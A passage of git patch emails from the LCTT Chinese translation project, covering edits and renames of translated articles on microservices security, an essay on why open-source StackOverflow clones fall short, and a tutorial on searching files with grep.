+以及还有更多。我们都知道并不是每个人都擅长于编写与安全相关的代码。通过分解你的体系架构,你得到机会去把最棒的安全人员去限制 J. 随机编码器 [8][10] 会把一些关键的安全控制措施绕过或降级的危险。 + +它可以作为学校的机会:它总能够指向 设计/实现/测试/监视元组 并且说:“听,读,标记,学习,内在消化。这是应该做的。[9][11] ” + +是否应该将所有遗留应用程序分解为微服务? 你可能可能不会。 但是考虑到所有的好处,你可以考虑从安全功能开始。 + +* * * + +1、有一点——有读者总是好的。 + +2、我知道他们的意义:我写下了他们。 + +3、可能不那么使人着迷。 + +4、在写这篇文章时。我或你们中的一个可能会去编辑改变它。 + +5、这很有趣,听起来想一个园艺术语。并不是说我很喜欢园艺,但仍然... [6][12] + +6、有趣地,我首先写了 “如果你要分解你的架构....” 这听起来想是一个 IT 主题的谋杀电影标题。 + +7、定期的读者可能会记得提到的优秀电影 “The Thick of It” + +8、其他存在的常规人物:请随便选择。 + +9、不是加密摘要:我不认同原作者的想法。 + +这篇文章最初出在[爱丽丝与鲍伯](https://zh.wikipedia.org/zh-hans/%E6%84%9B%E9%BA%97%E7%B5%B2%E8%88%87%E9%AE%91%E4%BC%AF)——一个安全博客上,并被许可转载。 + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/11/microservices-are-security-issue + +作者:[Mike Bursell ][a] +译者:[erlinux](https://itxdm.me) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/mikecamel +[1]:https://blog.openshift.com/microservices-how-to-explain-them-to-your-ceo/?intcmp=7016000000127cYAAQ&amp;amp;amp;amp;amp;amp;amp;src=microservices_resource_menu1 +[2]:https://www.openshift.com/promotions/microservices.html?intcmp=7016000000127cYAAQ&amp;amp;amp;amp;amp;amp;amp;src=microservices_resource_menu2 +[3]:https://opensource.com/business/16/11/secured-devops-microservices?src=microservices_resource_menu3 +[4]:https://opensource.com/article/17/11/microservices-are-security-issue?rate=GDH4xOWsgYsVnWbjEIoAcT_92b8gum8XmgR6U0T04oM +[5]:https://opensource.com/article/17/11/microservices-are-security-issue#1 +[6]:https://opensource.com/article/17/11/microservices-are-security-issue#2 +[7]:https://opensource.com/article/17/11/microservices-are-security-issue#3 +[8]:https://opensource.com/article/17/11/microservices-are-security-issue#5 +[9]:https://opensource.com/article/17/11/microservices-are-security-issue#7 +[10]:https://opensource.com/article/17/11/microservices-are-security-issue#8 +[11]:https://opensource.com/article/17/11/microservices-are-security-issue#9 +[12]:https://opensource.com/article/17/11/microservices-are-security-issue#6 +[13]:https://aliceevebob.com/2017/10/31/why-microservices-are-a-security-issue/ +[14]:https://opensource.com/user/105961/feed +[15]:https://opensource.com/tags/security +[16]:https://aliceevebob.com/2017/03/14/systems-security-why-it-matters/ +[17]:https://opensource.com/article/17/11/microservices-are-security-issue#4 +[18]:https://opensource.com/article/17/10/systems-architect +[19]:https://opensource.com/users/mikecamel +[20]:https://opensource.com/users/mikecamel +[21]:https://opensource.com/users/mikecamel +[22]:https://opensource.com/article/17/11/microservices-are-security-issue#comments +[23]:https://opensource.com/resources/what-are-microservices +[24]:https://en.wikipedia.org/wiki/Microservices +[25]:https://en.wikipedia.org/wiki/Unix_philosophy From 903fa5f888c48fdf38c5e4cf1eec4d6da791e867 Mon Sep 17 00:00:00 2001 From: wxy Date: Fri, 15 Dec 2017 23:49:01 +0800 Subject: [PATCH 0600/1627] =?UTF-8?q?=E4=BF=AE=E6=AD=A3=E6=96=87=E4=BB=B6?= =?UTF-8?q?=E5=90=8D=E7=9A=84=E5=A5=87=E6=80=AA=E4=B8=8D=E5=8F=AF=E8=A7=81?= =?UTF-8?q?=E5=AD=97=E7=AC=A6?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @erlinux --- ...issue.md => 20171123 Why microservices are a security issue.md} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename translated/tech/{20171123 Why microservices are a security issue.md => 20171123 Why microservices are a security issue.md} (100%) diff --git a/translated/tech/20171123 Why microservices are a security issue.md b/translated/tech/20171123 Why microservices are a security issue.md similarity index 100% rename from translated/tech/20171123 Why microservices are a security issue.md rename to translated/tech/20171123 Why microservices are a security issue.md From e18cb946b06b38319ea076d99768e49429edcf82 Mon Sep 17 00:00:00 2001 From: liuxinyu123 Date: Sat, 16 Dec 2017 00:05:14 +0800 Subject: [PATCH 0601/1627] translating by liuxinyu123 --- .../tech/20170910 Useful Linux Commands that you should know.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20170910 Useful Linux Commands that you should know.md b/sources/tech/20170910 Useful Linux Commands that you should know.md index 6dcd34c941..b3975de6ec 100644 --- a/sources/tech/20170910 Useful Linux Commands that you should know.md +++ b/sources/tech/20170910 Useful Linux Commands that you should know.md @@ -1,3 +1,5 @@ +translating by liuxinyu123 + Useful Linux Commands that you should know ====== If you are Linux system administrator or just a Linux enthusiast/lover, than From c28edb8032b1e8107973efd9103d674fba448212 Mon Sep 17 00:00:00 2001 From: wxy Date: Sat, 16 Dec 2017 00:13:15 +0800 Subject: [PATCH 0602/1627] PRF&PUB:20090701 The One in Which I Call Out Hacker News.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @hopefully2333 恭喜你,完成了第一篇翻译。不过这篇文章确实很艰涩,你在这次翻译中,有如下方面需要注意: - 不要选择太超出自己的语言能力、知识范围的文章,如果感觉力不从心,可以选择回滚放弃。开始的时候,建议从简短的文章开始你的贡献。 - 翻译完之后,请自己再三阅读,确保自己能读通,读顺。 - 要注意保留文内的 markdown 格式,否则会给发布造成很多困扰。 最后要,感谢这篇文章的校对 @yunfengHe ,基本上花费了好几天,对这篇文章进行了重新打造,具体你可以看看你的译文和校对后的文章比较,想必可以学习到一些。 --- ...The One in Which I Call Out Hacker News.md | 36 +++++++++---------- 1 file changed, 17 insertions(+), 19 deletions(-) diff --git a/translated/tech/20090701 The One in Which I Call Out Hacker News.md b/translated/tech/20090701 The One in Which I Call Out Hacker News.md index 0b06d3259a..59b8a63fde 100644 --- a/translated/tech/20090701 The One in Which I Call Out Hacker News.md +++ b/translated/tech/20090701 The One in Which I Call Out Hacker News.md @@ -6,26 +6,25 @@ > > — 出自 [Owen Astrachan][1] 教授于 2004 年 2 月 23 日在 [CPS 108][2] 上的讲座 -[指责开源软件总是离奇难用已经不是一个新论点了][5]; 这样的论点之前就被很多比我更为雄辩的人提及过, 甚至是出自一些人非常推崇开源软件的人士口中。那么为什么我要在这里老调重弹呢? +[指责开源软件总是离奇难用已经不是一个新论点了][5];这样的论点之前就被很多比我更为雄辩的人提及过,甚至是出自一些人非常推崇开源软件的人士口中。那么为什么我要在这里老调重弹呢? -在周一的 Hacker News 期刊上,一段文章把我逗乐了。文章谈到,一些人认为 [编写代码实现和一个跟 StackOverflow 一样的系统可以简单到爆][6],并自信的 [声称他们可以在7月4号的周末就写出一版和 StackOverflow 原版一摸一样的程序][7],以此来证明这一切是多么容易。另一些人则插话说,[现有的][8][那些仿制产品][9] 就已经是一个很好的例证了。 +在周一的 Hacker News 期刊上,一段文章把我逗乐了。文章谈到,一些人认为 [编写代码实现和一个跟 StackOverflow 一样的系统可以简单到爆][6],并自信的 [声称他们可以在 7 月 4 号的周末就写出一版和 StackOverflow 原版一模一样的程序][7],以此来证明这一切是多么容易。另一些人则插话说,[现有的][8][那些仿制产品][9] 就已经是一个很好的例证了。 -秉承着自由讨论的精神,我们来假设一个场景。你在思考了一阵之后认为你可以用 ASP.NET MVC 来编写一套你自己的 StackOverflow 。我呢,在被一块儿摇晃着的怀表催眠之后,脑袋又挨了别人一顿棒槌,然后像个二哈一样一页一页的把 StackOverflow 的源码递给你,让你照原样重新拿键盘逐字逐句的在你的环境下把那些代码再敲一遍,做成你的 StackOverflow。假设你可以向我一样打字飞快,一分钟能敲100个词 ([也就是大约每秒敲八个字母][10]),但是却可以牛叉到我无法企及的打字零错误率。从 StackOverflow 的大小共计2.3MB的源码来估计(包括.CS, .SQL, .CSS, .JS 和 .aspx文件),就单单是照着源代码这么飞速敲一遍而且一气呵成中间一个字母都不错,你也要差不多用掉至少 80 个小时的时间。 +秉承着自由讨论的精神,我们来假设一个场景。你在思考了一阵之后认为你可以用 ASP.NET MVC 来编写一套你自己的 StackOverflow 。我呢,在被一块儿摇晃着的怀表催眠之后,脑袋又挨了别人一顿棒槌,然后像个二哈一样一页一页的把 StackOverflow 的源码递给你,让你照原样重新拿键盘逐字逐句的在你的环境下把那些代码再敲一遍,做成你的 StackOverflow。假设你可以像我一样打字飞快,一分钟能敲 100 个词 ([也就是大约每秒敲八个字母][10]),但是却可以牛叉到我无法企及的打字零错误率。从 StackOverflow 的大小共计 2.3MB 的源码来估计(包括 .CS、 .SQL、 .CSS、 .JS 和 .aspx 文件),就单单是照着源代码这么飞速敲一遍而且一气呵成中间一个字母都不错,你也要差不多用掉至少 80 个小时的时间。 -或者你打算从零开始编码实现你自己的 StackOverflow,虽然我知道你肯定是不会那样做的。我们假设你从设计程序,到敲代码,再到最终完成调试只需要区区十倍于抄袭 StackOverflow 源代码的时间。即使在这样的假设条件下,你也要耗费几周的时间昼夜不停得狂写代码。不知道你是否愿意,但是至少我可以欣然承认,如果只给我照抄源 StackOverflow 代码用时的十倍时间来让我自己写 StackOverflow, 我可是打死也做不到。 +或者你打算从零开始编码实现你自己的 StackOverflow,虽然我知道你肯定是不会那样做的。我们假设你从设计程序,到敲代码,再到最终完成调试只需要区区十倍于抄袭 StackOverflow 源代码的时间。即使在这样的假设条件下,你也要耗费几周的时间昼夜不停得狂写代码。不知道你是否愿意,但是至少我可以欣然承认,如果只给我照抄 StackOverflow 源代码用时的十倍时间来让我自己写 StackOverflow,我可是打死也做不到。 -_好的_,我知道你在听到这些假设的时候已经开始觉得泄气了。*你在想,如果不是全部实现,而只是实现 StackOverflow **大部分** 的功能呢?这总归会容易很多了吧。* +_好的_,我知道你在听到这些假设的时候已经开始觉得泄气了。*你在想,如果不是全部实现,而只是实现 StackOverflow __大部分__ 的功能呢?这总归会容易很多了吧。* -好的,问题是什么是 "大部分" 功能?如果只去实现提问和回答问题的功能?这个部分应该很简单吧。其实不然,因为实现问和答的功能还要求你必须做出一个对问题和其答案的投票系统,来显示大家对某个答案是赞同还是反对。因为只有这样你才能保证提问者可以得到这个问题的唯一的可信答案。当然,你还不能让人们赞同或者反对他们自己给出的答案,所以你还要去实现这种禁止自投自票的机制。除此之外,你需要去确保用户在一定的时间内不能赞同或反对其他用户太多次,以此来防止有人用机器人程序作弊乱投票。你很可能还需要去实现一个垃圾评论过滤器,即使这个过滤器很基础很简陋,你也要考虑如何去设计它。而且你恐怕还需要去支持用户图标(头像)的功能。并且你将不得不寻找一个自己真正信任的并且 -与 Markdown 接合很好的干净的 HTML 库(当然,假设你确实想要复用 StackOverflow 的 [那个超棒的编辑器][11] )。你还需要为所有控件购买或者设计一些小图标小部件,此外你至少需要实现一个基本的管理界面,以便那些喜欢捣鼓的用户可以调整和改动他们的个性化设置。并且你需要实现类似于 Karma 的声望累积系统,以便用户可以随着不断地使用来稳步提升他们的话语权和解锁更多的功能以及可操作性。 +好的,问题是什么是 “大部分” 功能?如果只去实现提问和回答问题的功能?这个部分应该很简单吧。其实不然,因为实现问和答的功能还要求你必须做出一个对问题及其答案的投票系统,来显示大家对某个答案是赞同还是反对。因为只有这样你才能保证提问者可以得到这个问题的唯一的可信答案。当然,你还不能让人们赞同或者反对他们自己给出的答案,所以你还要去实现这种禁止自投自票的机制。除此之外,你需要去确保用户在一定的时间内不能赞同或反对其他用户太多次,以此来防止有人用机器人程序作弊乱投票。你很可能还需要去实现一个垃圾评论过滤器,即使这个过滤器很基础很简陋,你也要考虑如何去设计它。而且你恐怕还需要去支持用户图标(头像)的功能。并且你将不得不寻找一个自己真正信任的并且与 Markdown 结合很好的干净的 HTML 库(当然,假设你确实想要复用 StackOverflow 的 [那个超棒的编辑器][11] )。你还需要为所有控件购买或者设计一些小图标、小部件,此外你至少需要实现一个基本的管理界面,以便那些喜欢捣鼓的用户可以调整和改动他们的个性化设置。并且你需要实现类似于 Karma 的声望累积系统,以便用户可以随着不断地使用来稳步提升他们的话语权和解锁更多的功能以及可操作性。 但是如果你实现了以上_所有_功能,可以说你_就已经_把要做的都做完了。 -除非...除非你还要做全文检索功能。尤其是在“边问边搜”(动态检索)的特性中,支持全文检索是必不可少的。此外,录入和显示用户的基本信息,实现对问题答案的评论功能,以及实现一个显示热点提问的页面,以及热点问题和帖子随着时间推移沉下去的这些功能,都将是不可或缺的。另外你肯定还需要去实现回答奖励系统,并支持每个用户用多个不同的 OpenID 账户去登录,然后将这些相关的登陆事件通过邮件发送出去来通知用户,并添加一个标签或徽章系统,接着允许管理员通过一个不错的图形界面来配置这些标签和徽章(Badge)。你需要去显示用户的 Karma 历史,以及他们的历史点赞和差评。而且整个页面还需要很流畅的展开和拉伸,因为这个系统的页面随时都可能被 Slashdot,Reddit 或是 StackOverflow 这些动作影响到。 +除非……除非你还要做全文检索功能。尤其是在“边问边搜”(动态检索)的特性中,支持全文检索是必不可少的。此外,录入和显示用户的基本信息,实现对问题答案的评论功能,以及实现一个显示热点提问的页面,以及热点问题和帖子随着时间推移沉下去的这些功能,都将是不可或缺的。另外你肯定还需要去实现回答奖励系统,并支持每个用户用多个不同的 OpenID 账户去登录,然后将这些相关的登录事件通过邮件发送出去来通知用户,并添加一个标签或徽章系统,接着允许管理员通过一个不错的图形界面来配置这些标签和徽章Badge。你需要去显示用户的 Karma 历史,以及他们的历史点赞和差评。而且整个页面还需要很流畅的展开和拉伸,因为这个系统的页面随时都可能被 Slashdot、Reddit 或是 StackOverflow 这些动作影响到。 在这之后!你会以为你基本已经大功告成了! -...为了产品的完整性,在上面所述的工作都完成之后,你又奋不顾身的去实现了升级功能,界面语言的国际化,Karma 值上限,以及让网站更专业的 CSS 设计,AJAX,还有那些看起来理所当然做起来却让人吐血的功能和特性。如果你不是真的动手来尝试做一个和 StackOverflow 一摸一样的系统,你肯定不会意识到在整个程序设计实施的过程中,你会踩到无数的鬼才会知道的大坑。 +……为了产品的完整性,在上面所述的工作都完成之后,你又奋不顾身的去实现了升级功能,界面语言的国际化,Karma 值上限,以及让网站更专业的 CSS 设计、AJAX,还有那些看起来理所当然做起来却让人吐血的功能和特性。如果你不是真的动手来尝试做一个和 StackOverflow 一模一样的系统,你肯定不会意识到在整个程序设计实施的过程中,你会踩到无数的鬼才会知道的大坑。 那么请你告诉我:如果你要做一个让人满意的类似产品出来,上述的哪一个功能是你可以省略掉的呢?哪些是“大部分”网站都具备的功能,哪些又不是呢? @@ -45,30 +44,29 @@ create table RESPONSE (ID identity primary key, QUESTION integer references QUESTION(ID)) ``` -如果你让这些开发者去实现 StackOverflow,进入他脑海中的就是上面的两个 SQL 表和一个用以呈现表格数据的 HTML 文件。他们甚至会忽略数据的格式问题,进而单纯的以为他们可以在一个周末的时间里就把 StackOverflow 做出来。一些稍微老练的开发者可能会意识到他们还要去实现登陆和注销功能,评论功能,投票系统,但是仍然会自信的认为这不过也就是利用一个周末就能完成了;因为这些功能也不过意味着在后端多了几张 SQL 表和 HTML 文件。如果借助于 Django 之类的构架和工具,他们甚至可以直接拿来主义地不花一分钱就实现用户登陆和评论的功能。 +如果你让这些开发者去实现 StackOverflow,进入他脑海中的就是上面的两个 SQL 表和一个用以呈现表格数据的 HTML 文件。他们甚至会忽略数据的格式问题,进而单纯的以为他们可以在一个周末的时间里就把 StackOverflow 做出来。一些稍微老练的开发者可能会意识到他们还要去实现登录和注销功能、评论功能、投票系统,但是仍然会自信的认为这不过也就是利用一个周末就能完成了;因为这些功能也不过意味着在后端多了几张 SQL 表和 HTML 文件。如果借助于 Django 之类的构架和工具,他们甚至可以直接拿来主义地不花一分钱就实现用户登录和评论的功能。 -但这种简单的实现却_远远不能_体现出 StackOverflow 的精髓。无论你对 StackOverflow 的感觉如何,大多数使用者似乎都同意 StackOverflow 的用户体验从头到尾都很流畅。使用 StackOverflow 的过程就是在跟一个精心打磨过的产品在愉快地交互。即使我没有深入了解过 StackOverflow ,我也能猜测出这个产品的成功和它数据库的 Schema 没有多大关系 - 实际上在有幸研读过 StackOverflow 的源码之后,我得以印证了自己的想法,StackOverflow 的成功确实和它的数据库设计关系甚小。真正让它成为一个极其易用的网站的原因,是它背后_大量的_精雕细琢的设计和实施。多数的开发人员在谈及仿制和克隆一款产品的难度时,真的_很少会去考虑到产品背后的打磨和雕琢工作_,因为他们认为_这些打磨和雕琢都是偶然的,甚至是无足轻重的。_ +但这种简单的实现却_远远不能_体现出 StackOverflow 的精髓。无论你对 StackOverflow 的感觉如何,大多数使用者似乎都同意 StackOverflow 的用户体验从头到尾都很流畅。使用 StackOverflow 的过程就是在跟一个精心打磨过的产品在愉快地交互。即使我没有深入了解过 StackOverflow ,我也能猜测出这个产品的成功和它的数据库的 Schema 没有多大关系 —— 实际上在有幸研读过 StackOverflow 的源码之后,我得以印证了自己的想法,StackOverflow 的成功确实和它的数据库设计关系甚小。真正让它成为一个极其易用的网站的原因,是它背后_大量的_精雕细琢的设计和实施。多数的开发人员在谈及仿制和克隆一款产品的难度时,真的_很少会去考虑到产品背后的打磨和雕琢工作_,因为他们认为_这些打磨和雕琢都是偶然的,甚至是无足轻重的。_ -这就是为什么用开源工具去克隆和山寨 StackOverflow 其实是很容易失败的。即使这些开源开发者只是想去实现 StackOverflow 的主要的“规范和标准特性”,而非全面的高级特性,他们也会在实现的过程中遭遇种种关键和核心的问题,让他们阴沟翻船,半途而废。拿 Badge (徽章功能)来说,如果你要针对普通终端用户来设计 Badge , 则要么需要实现一个用户可用来个性化设置 bagdge 的 GUI,要么则取巧的设计出一个比较通用的 Badge 供所有的安装版本来使用。而开源设计的实际情况是,开发者会有很多的抱怨和牢骚,认为给 Badge 这种东西设计一个功能全面的 GUI 是根本不肯能的。而且他们会固执地把任何标准 badge 的提案踢回去,踢出第一宇宙速度,击穿地壳甩到地球的另一端。最终这些开发者还是会搞出一个类似于 Roundup 的 bug tracker 程序都在使用的流程和方案:即实现一个通用的机制, 提供以 Python 或 Php 为基础的一些系统API, 以便那些可以自如使用 Python 或 Php 的人可以轻松的通过这些编程接口来定制化他们自己的 Badge。而且老实说,PHP 和 Python 可是比任何可能的 GUI 接口都要好用和强大得多,为什么还要考虑 GUI 的方案呢?(出自开源开发者的想法) - -同样的,开源开发者会认为那些系统设置和管理员界面也一样可以省略掉。在他们看来,假如你是一个管理员,有 SQL 服务器的权限,那么你就理所当然的具备那些系统管理员该有的知识和技能。那么你其实可以使用 Djang-admin 或者任何类似的工具来轻松的对 StackOverflow 做很多设置和改造工作。毕竟如果你是一个 mods (懂如何mod的人)那么你肯定知道网站是怎么工作的,懂得如何利用专业工具去设置和改造一个网站。对啊!这不就得了! 毋庸置疑,在开源开发者重做他们自己的 StackOverflow 的时候,他们也不会把任何 StackOverflow 在接口上面的失败设计纠正过来。即使是原版 StackOverflow 里面最愚蠢最失败的那个设计(即要求用户必须拥有一个 OpenID 并知道如何使用它)在某个将来最终被 StackOverflow 删除和修正掉了, 我相信正在复制 StackOverflow 模式的那些开源克隆产品也还是会不假思索的把这个 OpenID 的功能仿制出来。这就好比是 GNOME 和 KDE 多年以来一直在做的事情,他们并没有把精力放在如何在设计之初就避免 Windows 的那些显而易见的毛病和问题,相反的确是在亦步亦趋的重复着 Windows 的设计,想办法用开源的方式做出一个比拟 Windows 功能的系统。 +这就是为什么用开源工具去克隆和山寨 StackOverflow 其实是很容易失败的。即使这些开源开发者只是想去实现 StackOverflow 的主要的“规范和标准特性”,而非全面的高级特性,他们也会在实现的过程中遭遇种种关键和核心的问题,让他们阴沟翻船,半途而废。拿徽章功能来说,如果你要针对普通终端用户来设计徽章, 则要么需要实现一个用户可用来个性化设置徽章的 GUI,要么则取巧的设计出一个比较通用的徽章,供所有的安装版本来使用。而开源设计的实际情况是,开发者会有很多的抱怨和牢骚,认为给徽章这种东西设计一个功能全面的 GUI 是根本不可能的。而且他们会固执地把任何标准徽章的提案踢回去,踢出第一宇宙速度,击穿地壳甩到地球的另一端。最终这些开发者还是会搞出一个类似于 Roundup 的 bug tracker 程序都在使用的流程和方案:即实现一个通用的机制,提供以 Python 或 PHP 为基础的一些系统 API, 以便那些可以自如使用 Python 或 PHP 的人可以轻松的通过这些编程接口来定制化他们自己的徽章。而且老实说,PHP 和 Python 可是比任何可能的 GUI 接口都要好用和强大得多,为什么还要考虑 GUI 的方案呢?(出自开源开发者的想法) +同样的,开源开发者会认为那些系统设置和管理员界面也一样可以省略掉。在他们看来,假如你是一个管理员,有 SQL 服务器的权限,那么你就理所当然的具备那些系统管理员该有的知识和技能。那么你其实可以使用 Djang-admin 或者任何类似的工具来轻松的对 StackOverflow 做很多设置和改造工作。毕竟如果你是一个 mods (懂如何 mod 的人)那么你肯定知道网站是怎么工作的,懂得如何利用专业工具去设置和改造一个网站。对啊!这不就得了! 毋庸置疑,在开源开发者重做他们自己的 StackOverflow 的时候,他们也不会把任何 StackOverflow 在接口上面的失败设计纠正过来。即使是原版 StackOverflow 里面最愚蠢最失败的那个设计(即要求用户必须拥有一个 OpenID 并知道如何使用它)在某个将来最终被 StackOverflow 删除和修正掉了, 我相信正在复制 StackOverflow 模式的那些开源克隆产品也还是会不假思索的把这个 OpenID 的功能仿制出来。这就好比是 GNOME 和 KDE 多年以来一直在做的事情,他们并没有把精力放在如何在设计之初就避免 Windows 的那些显而易见的毛病和问题,相反的却是在亦步亦趋的重复着 Windows 的设计,想办法用开源的方式做出一个比拟 Windows 功能的系统。 开发者可能不会关心一个应用的上述设计细节,但是终端用户一定会。尤其是当他们在尝试去选择要使用哪个应用的时候,这些终端用户更会重视这些接口设计是否易用。就好像一家好的软件公司希望通过确保其产品在出货之前就有一流的质量,以降低售后维护支持的成本一样,懂行的消费者也会在他们购买这些产品之前就确保产品好用,以防在使用的时候不知所措,然后无奈的打电话给售后来解决问题。开源产品就失败在这里,而且相当之失败。一般来讲,付费软件则在这方面做得好很多。 -这不是说开源软件没有自己的立足之地,这个博客就运行在 Apache,[Django][12],[PostgreSQL][13] 和 Linux 搭建的开源系统之上。但是让我来告诉你吧,配置这些堆栈可不是谁都可以做的。老版本的 PostgreSQL 需要手工配置 Vacuuming 来确保数据库的自动清理,而即使是最新版本的 ubuntu 和 FreeBSD 也仍然要求用户去手工配置他们的第一个数据库集群。 -相比之下,MS SQL (微软的 SQL) 则不需要你手工配置以上的任何一样东西。至于 Apache ... 我的天,Apache 简直复杂到让我根本来不及去尝试给一个新用户讲解我们如何可以通过一个一次性的安装过程就能把虚拟机,MovableType,几个 Diango apps 和 WordPress 配置在一起并流畅地使用。单单是给那些技术背景还不错但并非软件开发者的用户解释清楚 Apache 的那些针对多进程和多线程的设置参数就已经够我喝一壶的了。相比之下,微软的 IIS 7 或者是使用了 OS X 服务器的那个几乎闭源的 GUI 管理器的 Apache ,在配置的时候就要简单上不止一个数量级了。Django 确实是一个好的开源产品,但它也 _只是_ 一个基础构架,而并非是一个可以直接面向终端普通用户的商业产品。而开源真正的强项就 _恰恰在_ 这种基础构架的开发和创新上,这也正是驱使开发者为开源做贡献的最本真的动力。 +这不是说开源软件没有自己的立足之地,这个博客就运行在 Apache、[Django][12]、[PostgreSQL][13] 和 Linux 搭建的开源系统之上。但是让我来告诉你吧,配置这些堆栈可不是谁都可以做的。老版本的 PostgreSQL 需要手工配置 Vacuuming 来确保数据库的自动清理,而即使是最新版本的 Ubuntu 和 FreeBSD 也仍然要求用户去手工配置他们的第一个数据库集群。 +相比之下,MS SQL (微软的 SQL 数据库) 则不需要你手工配置以上的任何一样东西。至于 Apache …… 我的天,Apache 简直复杂到让我根本来不及去尝试给一个新用户讲解我们如何可以通过一个一次性的安装过程就能把虚拟机、MovableType,几个 Diango apps 和 WordPress 配置在一起并流畅地使用。单单是给那些技术背景还不错但并非软件开发者的用户解释清楚 Apache 的那些针对多进程和多线程的设置参数就已经够我喝一壶的了。相比之下,微软的 IIS 7 或者是使用了 OS X 服务器的那个几乎闭源的 GUI 管理器的 Apache ,在配置的时候就要简单上不止一个数量级了。Django 确实是一个好的开源产品,但它也 _只是_ 一个基础构架,而并非是一个可以直接面向终端普通用户的商业产品。而开源真正的强项就 _恰恰在_ 这种基础构架的开发和创新上,这也正是驱使开发者为开源做贡献的最本真的动力。 -所以我的结论是,如果下次你再看到一个你喜欢的应用程序,请好好细心地揣摩一下这款产品,揣摩一下所有的那些针对用户的体贴入微的设计细节。而不是武断的认为你可以轻轻松松的再一周之内就用开源工具做一个和这个应用一摸一样的产品出来。那些认为制作和实现一个应用程序如此简单的人,十之八九都是因为忽略了软件开发的最终产品是要交给用户去用的。 +所以我的结论是,如果下次你再看到一个你喜欢的应用程序,请好好细心地揣摩一下这款产品,揣摩一下所有的那些针对用户的体贴入微的设计细节。而不是武断的认为你可以轻轻松松的在一周之内就用开源工具做一个和这个应用一摸一样的产品出来。那些认为制作和实现一个应用程序如此简单的人,十之八九都是因为忽略了软件开发的最终产品是要交给用户去用的。 ------------------------------------------------------------------------------- via: https://bitquabit.com/post/one-which-i-call-out-hacker-news/ 作者:[Benjamin Pollack][a] -译者:[hopefully2333](https://github.com/hopefully2333) -校对:[yunfengHe](https://github.com/yunfengHe) +译者:[hopefully2333](https://github.com/hopefully2333),[yunfengHe](https://github.com/yunfengHe) +校对:[yunfengHe](https://github.com/yunfengHe),[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 118cacf6b05899ffbd4076f08e1cc320e50a54df Mon Sep 17 00:00:00 2001 From: wxy Date: Sat, 16 Dec 2017 00:14:19 +0800 Subject: [PATCH 0603/1627] PUB:20090701 The One in Which I Call Out Hacker News.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @hopefully2333 @yunfengHe 文章发布地址: https://linux.cn/article-9148-1.html @hopefully2333 你的 LCTT 专页地址: https://linux.cn/lctt/hopefully2333 --- .../20090701 The One in Which I Call Out Hacker News.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20090701 The One in Which I Call Out Hacker News.md (100%) diff --git a/translated/tech/20090701 The One in Which I Call Out Hacker News.md b/published/20090701 The One in Which I Call Out Hacker News.md similarity index 100% rename from translated/tech/20090701 The One in Which I Call Out Hacker News.md rename to published/20090701 The One in Which I Call Out Hacker News.md From 13435675c35a92f279c2a44dbcd8bdeff27a1bb0 Mon Sep 17 00:00:00 2001 From: wxy Date: Sat, 16 Dec 2017 00:27:48 +0800 Subject: [PATCH 0604/1627] PRF&PUB:20171130 How to find all files with a specific text using Linux shell .md @lujun9972 --- ...with a specific text using Linux shell .md | 58 +++++++++++-------- 1 file changed, 33 insertions(+), 25 deletions(-) rename {translated/tech => published}/20171130 How to find all files with a specific text using Linux shell .md (78%) diff --git a/translated/tech/20171130 How to find all files with a specific text using Linux shell .md b/published/20171130 How to find all files with a specific text using Linux shell .md similarity index 78% rename from translated/tech/20171130 How to find all files with a specific text using Linux shell .md rename to published/20171130 How to find all files with a specific text using Linux shell .md index 41b02fc989..ab5939b60a 100644 --- a/translated/tech/20171130 How to find all files with a specific text using Linux shell .md +++ b/published/20171130 How to find all files with a specific text using Linux shell .md @@ -1,18 +1,14 @@ 如何在 Linux shell 中找出所有包含指定文本的文件 ------- -### 目标 +=========== -本文提供一些关于如何搜索出指定目录或整个文件系统中那些包含指定单词或字符串的文件。 +**目标:**本文提供一些关于如何搜索出指定目录或整个文件系统中那些包含指定单词或字符串的文件。 -### 难度 +**难度:**容易 -容易 +**约定:** -### 约定 - -* \# - 需要使用 root 权限来执行指定命令,可以直接使用 root 用户来执行也可以使用 sudo 命令 - -* \$ - 可以使用普通用户来执行指定命令 +* `#` - 需要使用 root 权限来执行指定命令,可以直接使用 root 用户来执行也可以使用 `sudo` 命令 +* `$` - 可以使用普通用户来执行指定命令 ### 案例 @@ -25,12 +21,14 @@ /etc/os-release:PRETTY_NAME="Debian GNU/Linux 9 (stretch)" /etc/os-release:VERSION="9 (stretch)" ``` -grep 的 `-s` 选项会在发现不能存在或者不能读取的文件时抑制报错信息。结果现实除了文件名外还有包含请求字符串的行也被一起输出了。 + +`grep` 的 `-s` 选项会在发现不存在或者不能读取的文件时隐藏报错信息。结果显示除了文件名之外,还有包含请求字符串的行也被一起输出了。 #### 递归地搜索包含指定字符串的文件 上面案例中忽略了所有的子目录。所谓递归搜索就是指同时搜索所有的子目录。 -下面的命令会在 `/etc/` 及其子目录中搜索包含 `stretch` 字符串的文件: + +下面的命令会在 `/etc/` 及其子目录中搜索包含 `stretch` 字符串的文件: ```shell # grep -R stretch /etc/* @@ -67,7 +65,8 @@ grep 的 `-s` 选项会在发现不能存在或者不能读取的文件时抑制 ``` #### 搜索所有包含特定单词的文件 -上面 `grep` 命令的案例中列出的是所有包含字符串 `stretch` 的文件。也就是说包含 `stretches` , `stretched` 等内容的行也会被显示。 使用 grep 的 `-w` 选项会只显示包含特定单词的行: + +上面 `grep` 命令的案例中列出的是所有包含字符串 `stretch` 的文件。也就是说包含 `stretches` , `stretched` 等内容的行也会被显示。 使用 `grep` 的 `-w` 选项会只显示包含特定单词的行: ```shell # grep -Rw stretch /etc/* @@ -84,8 +83,9 @@ grep 的 `-s` 选项会在发现不能存在或者不能读取的文件时抑制 /etc/os-release:VERSION="9 (stretch)" ``` -#### 显示包含特定文本文件的文件名 -上面的命令都会产生多余的输出。下一个案例则会递归地搜索 `etc` 目录中包含 